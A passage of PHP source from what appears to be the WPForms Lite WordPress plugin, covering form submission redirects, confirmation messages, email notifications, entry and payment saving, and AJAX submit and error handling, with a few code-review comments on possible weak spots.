			$url = apply_filters( 'wp_redirect', $url, 302 );
			$url = wp_sanitize_redirect( $url );

			header( sprintf( 'AMP-Redirect-To: %s', $url ) );
			header( 'Access-Control-Expose-Headers: AMP-Redirect-To', false );

			// NOTE(review): wp_send_json() presumably ends the request, in which case the
			// wpforms_process_redirect actions below never fire for AMP - confirm.
			wp_send_json(
				[
					'message'     => __( 'Redirecting…', 'wpforms-lite' ),
					'redirecting' => true,
				],
				200
			);
		} else {
			// wp_redirect() does not restrict the destination host (unlike wp_safe_redirect()),
			// so the target is whatever the form settings and the filter above produced.
			wp_redirect( esc_url_raw( $url ) ); // phpcs:ignore
		}

		do_action( 'wpforms_process_redirect', $this->form_data['id'] );
		do_action( "wpforms_process_redirect_{$this->form_data['id']}", $this->form_data['id'] );
		// Stop here so nothing else is sent after the redirect header.
		exit;
	}

	// Pass a message to a frontend if no redirection happened.
	if ( ! empty( $confirmations[ $confirmation_id ]['type'] ) && 'message' === $confirmations[ $confirmation_id ]['type'] ) {
		$this->confirmation         = $confirmations[ $confirmation_id ];
		$this->confirmation_message = $confirmations[ $confirmation_id ]['message'];

		if ( ! empty( $confirmations[ $confirmation_id ]['message_scroll'] ) ) {
			wpforms()->get( 'frontend' )->confirmation_message_scroll = true;
		}
	}
}
/**
* Get confirmation message.
*
* @since 1.5.3
*
* @param array $form_data Form data and settings.
* @param array $fields Sanitized field data.
* @param int $entry_id Entry id.
*
* @return string Confirmation message.
*/
public function get_confirmation_message( $form_data, $fields, $entry_id ) {
	// No message was selected for this submission.
	if ( empty( $this->confirmation_message ) ) {
		return '';
	}

	// Expand smart tags first, then wrap paragraphs and let callbacks adjust the result.
	$with_tags = wpforms_process_smart_tags( $this->confirmation_message, $form_data, $fields, $entry_id );

	return apply_filters( 'wpforms_frontend_confirmation_message', wpautop( $with_tags ), $form_data, $fields, $entry_id );
}
/**
* Get current confirmation.
*
* @since 1.6.9
*
* @return array
*/
public function get_current_confirmation() {
	// Fall back to an empty array while no confirmation has been selected.
	if ( empty( $this->confirmation ) ) {
		return [];
	}

	return $this->confirmation;
}
/**
* Catch the post_max_size overflow.
*
* @since 1.5.2
*
* @return bool
*/
public function post_max_size_overflow() {
	// phpcs:disable WordPress.Security.NonceVerification
	// Both the declared request size and the form id in the query string are needed.
	if ( empty( $_SERVER['CONTENT_LENGTH'] ) || empty( $_GET['wpforms_form_id'] ) ) {
		return false;
	}

	$form_id       = (int) $_GET['wpforms_form_id'];
	$total_size    = (int) $_SERVER['CONTENT_LENGTH'];
	$post_max_size = wpforms_size_to_bytes( ini_get( 'post_max_size' ) );

	// An overflow is reported only when the request is larger than post_max_size,
	// $_POST is empty and the form id is positive.
	if ( ! ( $total_size > $post_max_size ) || ! empty( $_POST ) || $form_id <= 0 ) {
		return false;
	}
	// phpcs:enable WordPress.Security.NonceVerification

	$bytes_per_mb = 1048576;

	$headline = esc_html__( 'Form has not been submitted, please see the errors below.', 'wpforms-lite' );
	$details  = sprintf( /* translators: %1$.3f - total size of the selected files in megabytes, %2$.3f - allowed file upload limit in megabytes.*/
		esc_html__( 'The total size of the selected files %1$.3f MB exceeds the allowed limit %2$.3f MB.', 'wpforms-lite' ),
		esc_html( $total_size / $bytes_per_mb ),
		esc_html( $post_max_size / $bytes_per_mb )
	);

	$this->errors[ $form_id ]['header'] = $headline . '<br>' . $details;

	return true;
}
/**
* Send entry email notifications.
*
* @since 1.0.0
*
* @param array $fields List of fields.
* @param array $entry Submitted form entry.
* @param array $form_data Form data and settings.
* @param int $entry_id Saved entry id.
* @param string $context In which context this email is sent.
*/
public function entry_email( $fields, $entry, $form_data, $entry_id, $context = '' ) {
	// Sends one email per configured notification and recipient. Returns nothing;
	// hooked filters can suppress all emails, or individual notifications.

	// Check that the form was configured for email notifications.
	if ( empty( $form_data['settings']['notification_enable'] ) ) {
		return;
	}

	/**
	 * Allow entry email notifications to be disabled.
	 *
	 * @since 1.0.0
	 *
	 * @param bool  $enabled   Whether to send the email.
	 * @param array $fields    List of fields.
	 * @param array $entry     Form submission raw data.
	 * @param array $form_data Form data and settings.
	 */
	if ( ! apply_filters( 'wpforms_entry_email', true, $fields, $entry, $form_data ) ) { // phpcs:ignore WPForms.PHP.ValidateHooks.InvalidHookName
		return;
	}

	// Make sure we have an entry id.
	if ( empty( $this->entry_id ) ) {
		$this->entry_id = (int) $entry_id;
	}

	/**
	 * Filter entry email notifications data.
	 *
	 * @since 1.0.0
	 *
	 * @param array $fields    List of fields.
	 * @param array $entry     Form submission raw data.
	 * @param array $form_data Form data and settings.
	 */
	$fields = apply_filters( 'wpforms_entry_email_data', $fields, $entry, $form_data ); // phpcs:ignore WPForms.PHP.ValidateHooks.InvalidHookName

	// Backwards compatibility for notifications before v1.4.3.
	if ( empty( $form_data['settings']['notifications'] ) && ! empty( $form_data['settings']['notification_email'] ) ) {
		$notifications[1] = [
			'email'          => $form_data['settings']['notification_email'],
			'subject'        => $form_data['settings']['notification_subject'],
			'sender_name'    => $form_data['settings']['notification_fromname'],
			'sender_address' => $form_data['settings']['notification_fromaddress'],
			'replyto'        => $form_data['settings']['notification_replyto'],
			'message'        => '{all_fields}',
		];
	} else {
		// Read without an isset() check; a missing key would reach the loop below as null.
		$notifications = $form_data['settings']['notifications'];
	}

	foreach ( $notifications as $notification_id => $notification ) :

		// A notification without a recipient setting is skipped.
		if ( empty( $notification['email'] ) ) {
			continue;
		}

		/**
		 * Allow entry email notifications to be disabled for a specific notification.
		 *
		 * @since 1.0.0
		 *
		 * @param bool   $enabled         Whether to send the email.
		 * @param array  $fields          List of fields.
		 * @param array  $form_data       Form data and settings.
		 * @param int    $notification_id Notification ID.
		 * @param string $context         In which context this email is sent.
		 */
		$process_email = apply_filters( 'wpforms_entry_email_process', true, $fields, $form_data, $notification_id, $context );

		if ( ! $process_email ) {
			continue;
		}

		$email = [];

		// Setup email properties.
		$email['subject']        = ! empty( $notification['subject'] ) ?
			$notification['subject'] :
			sprintf( /* translators: %s - form name. */
				esc_html__( 'New %s Entry', 'wpforms-lite' ),
				$form_data['settings']['form_title']
			);
		// Recipients: smart tags are expanded first, so a recipient can come from a submitted
		// value when the setting references a field; the result is split on commas and each
		// part goes through sanitize_email().
		$email['address']        = explode( ',', wpforms_process_smart_tags( $notification['email'], $form_data, $fields, $this->entry_id ) );
		$email['address']        = array_map( 'sanitize_email', $email['address'] );
		// Sender, reply-to and (below) CC are taken from the notification settings as stored.
		// NOTE(review): no validation of these values is visible here - presumably the
		// Notifications class handles smart tags and header safety; confirm.
		$email['sender_address'] = ! empty( $notification['sender_address'] ) ? $notification['sender_address'] : get_option( 'admin_email' );
		$email['sender_name']    = ! empty( $notification['sender_name'] ) ? $notification['sender_name'] : get_bloginfo( 'name' );
		$email['replyto']        = ! empty( $notification['replyto'] ) ? $notification['replyto'] : false;
		$email['message']        = ! empty( $notification['message'] ) ? $notification['message'] : '{all_fields}';
		$email['template']       = ! empty( $notification['template'] ) ? $notification['template'] : '';

		/**
		 * Filter entry email notifications attributes.
		 *
		 * @since 1.0.0
		 *
		 * @param array $email           Email attributes.
		 * @param array $fields          List of fields.
		 * @param array $entry           Form submission raw data.
		 * @param array $form_data       Form data and settings.
		 * @param int   $notification_id Notification ID.
		 */
		$email = apply_filters( 'wpforms_entry_email_atts', $email, $fields, $entry, $form_data, $notification_id ); // phpcs:ignore WPForms.PHP.ValidateHooks.InvalidHookName

		// Create new email.
		$emails = ( new WPForms\Emails\Notifications() )->init( $email['template'] );

		$emails->__set( 'form_data', $form_data );
		$emails->__set( 'fields', $fields );
		$emails->__set( 'notification_id', $notification_id );
		$emails->__set( 'entry_id', $this->entry_id );
		$emails->__set( 'from_name', $email['sender_name'] );
		$emails->__set( 'from_address', $email['sender_address'] );
		$emails->__set( 'reply_to', $email['replyto'] );

		// Maybe include CC: only when the notification has one and the global setting allows it.
		if ( ! empty( $notification['carboncopy'] ) && wpforms_setting( 'email-carbon-copy', false ) ) {
			$emails->__set( 'cc', $notification['carboncopy'] );
		}

		/**
		 * Filter entry email notifications before sending.
		 *
		 * @since 1.0.0
		 *
		 * @param object $emails WPForms_WP_Emails instance.
		 */
		$emails = apply_filters( 'wpforms_entry_email_before_send', $emails );

		// Go. One send() call per recipient.
		// NOTE(review): an address rejected by sanitize_email() is presumably an empty string
		// by now and is still passed to send() - confirm send() ignores empty recipients.
		foreach ( $email['address'] as $address ) {
			$emails->send( trim( $address ), $email['subject'], $email['message'] );
		}
	endforeach;
}
/**
* Save entry to database.
*
* @since 1.0.0
*
* @param array $fields List of form fields.
* @param array $entry User submitted data.
* @param int $form_id Form ID.
* @param array $form_data Prepared form settings.
*
* @return int
*/
public function entry_save( $fields, $entry, $form_id, $form_data = [] ) {
	// Drop raw password values before the fields are handed to the save hook.
	$storable_fields = $this->remove_raw_data_before_save( $fields );

	/**
	 * Fires on entry save.
	 *
	 * @since 1.0.0
	 *
	 * @param array $fields    List of form fields.
	 * @param array $entry     Form submission raw data.
	 * @param int   $form_id   Form ID.
	 * @param array $form_data Prepared form settings.
	 */
	do_action( 'wpforms_process_entry_save', $storable_fields, $entry, $form_id, $form_data );

	// Nothing is written to storage in this method itself; it only fires the hook and
	// returns the entry id held on the instance.
	return $this->entry_id;
}
/**
* Remove raw data from fields before saving.
* This is needed to prevent raw password data from being saved to the database.
*
* @since 1.8.6
*
* @param array $fields List of form fields.
*
* @return array
*/
private function remove_raw_data_before_save( array $fields ): array {
	// Only password fields lose `value_raw`; every other field is returned untouched,
	// and array keys are preserved.
	return array_map(
		static function ( $field ) {
			if ( isset( $field['type'] ) && $field['type'] === 'password' ) {
				unset( $field['value_raw'] );
			}

			return $field;
		},
		$fields
	);
}
/**
* Save payment to the database.
*
* @since 1.8.2
*
* @param array $entry User submitted data.
*
* @return int Payment ID.
*/
private function payment_save( $entry ) {
	// Forms without a payment field have nothing to record.
	if ( ! wpforms_has_payment( 'entry', $this->fields ) ) {
		return 0;
	}

	// Attach the entry id to the raw submission before it is registered.
	$entry['entry_id'] = $this->entry_id;

	$submission = wpforms()->get( 'submission' )->register( $this->fields, $entry, $this->form_data['id'], $this->form_data );

	// Prepare the payment data.
	$data = $submission->prepare_payment_data();

	// A payment field may exist without any payment data (e.g. an old payment addon is used).
	if ( empty( $data['gateway'] ) ) {
		return 0;
	}

	// Create payment; a falsy id means it was not stored.
	$new_payment_id = wpforms()->get( 'payment' )->add( $data );

	if ( ! $new_payment_id ) {
		return 0;
	}

	// Insert payment meta.
	wpforms()->get( 'payment_meta' )->bulk_add( $new_payment_id, $submission->prepare_payment_meta() );

	/**
	 * Fire after payment was saved to database.
	 *
	 * @since 1.8.2
	 *
	 * @param int   $payment_id Payment id.
	 * @param array $fields     Form fields.
	 * @param array $form_data  Form data.
	 */
	do_action( 'wpforms_process_payment_saved', $new_payment_id, $this->fields, $this->form_data );

	return $new_payment_id;
}
/**
* Process AJAX form submit.
*
* @since 1.5.3
*/
public function ajax_submit() {
	// AJAX entry point for a form submission: runs the normal processing through
	// listen() and answers with JSON (errors, a redirect, or the rendered confirmation).

	// phpcs:disable WordPress.Security.NonceVerification.Missing
	$form_id = isset( $_POST['wpforms']['id'] ) ? absint( $_POST['wpforms']['id'] ) : 0;

	// wp_send_json_error() ends the request, so nothing below runs without a form id.
	if ( empty( $form_id ) ) {
		wp_send_json_error();
	}

	if ( isset( $_POST['wpforms']['post_id'] ) ) {
		// We don't have a global $post when processing ajax requests.
		// Therefore, it's needed to set a global $post manually for compatibility with functions used in smart tag processing.
		// NOTE(review): post_id is supplied by the client and no status or permission check is
		// visible here - confirm smart tags cannot expose data from non-public posts.
		global $post;
		// phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited
		$post = WP_Post::get_instance( absint( $_POST['wpforms']['post_id'] ) );
	}
	// phpcs:enable WordPress.Security.NonceVerification.Missing

	// Late priority (999): ajax_process_redirect() sees the URL after other wp_redirect callbacks.
	add_filter( 'wp_redirect', [ $this, 'ajax_process_redirect' ], 999 );

	do_action( 'wpforms_ajax_submit_before_processing', $form_id );

	// If redirect happens in listen(), ajax_process_redirect() gets executed because of the filter on `wp_redirect`.
	// The code, that is below listen(), runs only if no redirect happened.
	$this->listen();

	$form_data = $this->form_data;

	// listen() left no form data behind: load the form directly.
	if ( empty( $form_data ) ) {
		$form_data = wpforms()->get( 'form' )->get( $form_id, [ 'content_only' => true ] );
		$form_data = apply_filters( 'wpforms_frontend_form_data', $form_data );
	}

	if ( ! empty( $this->errors[ $form_id ] ) ) {
		// ajax_process_errors() sends its own JSON response; the call after it is a fallback.
		$this->ajax_process_errors( $form_id, $form_data );
		wp_send_json_error();
	}

	// Capture the confirmation markup that the frontend prints into an output buffer.
	ob_start();

	wpforms()->get( 'frontend' )->confirmation( $form_data );

	$response = apply_filters( 'wpforms_ajax_submit_success_response', [ 'confirmation' => ob_get_clean() ], $form_id, $form_data );

	do_action( 'wpforms_ajax_submit_completed', $form_id, $response );

	wp_send_json_success( $response );
}
/**
* Process AJAX errors.
*
* @since 1.5.3
* @todo This should be re-used/combined for AMP verify-xhr requests.
*
* @param int $form_id Form ID.
* @param array $form_data Form data and settings.
*/
protected function ajax_process_errors( $form_id, $form_data ) {
	// Builds the JSON error response for an AJAX submission and sends it.
	// Every path ends in wp_send_json_error(), so this method does not return to its caller.

	$errors = isset( $this->errors[ $form_id ] ) ? $this->errors[ $form_id ] : [];

	$errors = apply_filters( 'wpforms_ajax_submit_errors', $errors, $form_id, $form_data );

	if ( empty( $errors ) ) {
		wp_send_json_error();
	}

	// General errors are errors that cannot be populated with jQuery Validate plugin.
	$general_errors = array_intersect_key( $errors, array_flip( [ 'header', 'footer', 'recaptcha' ] ) );

	// Replace each general error with the markup the frontend renders for it.
	foreach ( $general_errors as $key => $error ) {
		ob_start();
		wpforms()->get( 'frontend' )->form_error( $key, $error, $form_data );
		$general_errors[ $key ] = ob_get_clean();
	}

	$fields = isset( $form_data['fields'] ) ? $form_data['fields'] : [];

	// Get registered fields errors only.
	$field_errors = array_intersect_key( $errors, $fields );

	// Transform field ids to field names for jQuery Validate plugin.
	foreach ( $field_errors as $key => $error ) {

		$name = $this->ajax_error_field_name( $fields[ $key ], $form_data, $error );

		if ( $name ) {
			$field_errors[ $name ] = $error;
		}

		// The id-keyed entry is always removed; an error with no resolved name is dropped.
		unset( $field_errors[ $key ] );
	}

	$response = [];

	if ( $general_errors ) {
		$response['errors']['general'] = $general_errors;
	}

	if ( $field_errors ) {
		$response['errors']['field'] = $field_errors;
	}

	$response = apply_filters( 'wpforms_ajax_submit_errors_response', $response, $form_id, $form_data );

	do_action( 'wpforms_ajax_submit_completed', $form_id, $response );

	wp_send_json_error( $response );
}
/**
* Get field name for ajax error message.
*
* @since 1.6.3
*
* @param array $field Field settings.
* @param array $form_data Form data and settings.
* @param string $error Error message.
*
* @return string
*/
private function ajax_error_field_name( $field, $form_data, $error ) {
	$frontend   = wpforms()->get( 'frontend' );
	$properties = $frontend->get_field_properties( $field, $form_data );

	// The name defaults to an empty string; a hooked callback is expected to supply the real one.
	return apply_filters( 'wpforms_process_ajax_error_field_name', '', $field, $properties, $error );
}
/**
* Process AJAX redirect.
*
* @since 1.5.3
*
* @param string $url Redirect URL.
*/
public function ajax_process_redirect( $url ) {
	$form_id = 0;

	// phpcs:ignore WordPress.Security.NonceVerification.Missing
	if ( isset( $_POST['wpforms']['id'] ) ) {
		// phpcs:ignore WordPress.Security.NonceVerification.Missing
		$form_id = absint( $_POST['wpforms']['id'] );
	}

	if ( empty( $form_id ) ) {
		wp_send_json_error();
	}

	// The redirect target is handed back to the browser as JSON data instead of being
	// followed on the server; callbacks can adjust the payload first.
	$payload = apply_filters(
		'wpforms_ajax_submit_redirect',
		[
			'form_id'      => $form_id,
			'redirect_url' => $url,
		],
		$form_id,
		$url
	);

	do_action( 'wpforms_ajax_submit_completed', $form_id, $payload );

	wp_send_json_success( $payload );
}
}